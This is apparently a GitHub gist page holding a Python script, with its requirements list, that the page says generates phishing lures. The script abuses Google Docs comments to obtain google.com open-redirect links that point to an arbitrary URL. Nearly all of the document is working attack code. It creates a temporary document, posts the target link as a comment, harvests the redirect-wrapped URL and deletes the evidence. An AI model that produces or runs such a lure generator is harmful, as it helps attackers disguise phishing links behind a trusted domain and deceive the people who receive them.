-
-
Save djhohnstein/a3e23654647b807ba61a83a8f0c312c8 to your computer and use it in GitHub Desktop.
Generate phishing lures that exploit open-redirects from www.google.com using Google Docs
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from __future__ import print_function | |
import pickle | |
import os.path | |
from googleapiclient.discovery import build | |
from google_auth_oauthlib.flow import InstalledAppFlow | |
from google.auth.transport.requests import Request | |
from apiclient import errors | |
import re | |
from bs4 import BeautifulSoup as Soup | |
SCOPES = [ | |
'https://www.googleapis.com/auth/drive', | |
'https://www.googleapis.com/auth/drive.appdata', | |
'https://www.googleapis.com/auth/drive.file', | |
] | |
LURES = 'Get your links! https://twitter.com/ustayready is a great link.' | |
def main(): | |
creds = None | |
if os.path.exists('token.pickle'): | |
with open('token.pickle', 'rb') as token: | |
creds = pickle.load(token) | |
if not creds or not creds.valid: | |
if creds and creds.expired and creds.refresh_token: | |
creds.refresh(Request()) | |
else: | |
flow = InstalledAppFlow.from_client_secrets_file( | |
'credentials.json', SCOPES) | |
creds = flow.run_local_server(port=0) | |
with open('token.pickle', 'wb') as token: | |
pickle.dump(creds, token) | |
print('Establishing session(s)...') | |
service = build('docs', 'v1', credentials=creds) | |
drive_service = build('drive', 'v3', credentials=creds) | |
file_name = 'Testing Hax' | |
body = { 'title': file_name } | |
print(f'Creating temporary file: {file_name}') | |
doc = service.documents().create(body=body).execute() | |
doc_id = doc.get('documentId') | |
doc_title = doc.get('title') | |
print('Created temporary file success!') | |
new_comment = { 'content': LURES } | |
print(f'Creating temporary comment for {LURES}') | |
comment_response = drive_service.comments().create( | |
fileId=doc_id, | |
body=new_comment, | |
fields='id, htmlContent, content' | |
).execute() | |
print('Parsing lure(s)...') | |
html = Soup(comment_response['htmlContent'], 'html.parser') | |
urls = [a['href'] for a in html.find_all('a')] | |
for url in urls: | |
print(f'Lure found! {url}') | |
print('Deleting temporary file(s)...') | |
files = retrieve_all_files(drive_service, file_name) | |
print(f'Total {len(files)} files that match...') | |
for file in files: | |
file_id = file['id'] | |
print(f'Deleting temporary file: {file_id}') | |
res = drive_service.files().delete(fileId=file_id).execute() | |
print(f'Finished generating lures!') | |
def retrieve_all_files(service, file_name): | |
result = [] | |
page_token = None | |
while True: | |
try: | |
param = {} | |
if page_token: | |
param['pageToken'] = page_token | |
files_response = service.files().list( | |
q=f"name='{file_name}'", | |
fields='nextPageToken, files(id, name)', | |
pageToken=page_token | |
).execute() | |
result.extend(files_response['files']) | |
page_token = files_response.get('nextPageToken') | |
if not page_token: | |
break | |
except errors.HttpError as error: | |
print(f'An error occurred: {error}') | |
break | |
return result | |
if __name__ == '__main__': | |
main() |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
google-api-python-client | |
google-auth-httplib2 | |
google-auth-oauthlib | |
bs4 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment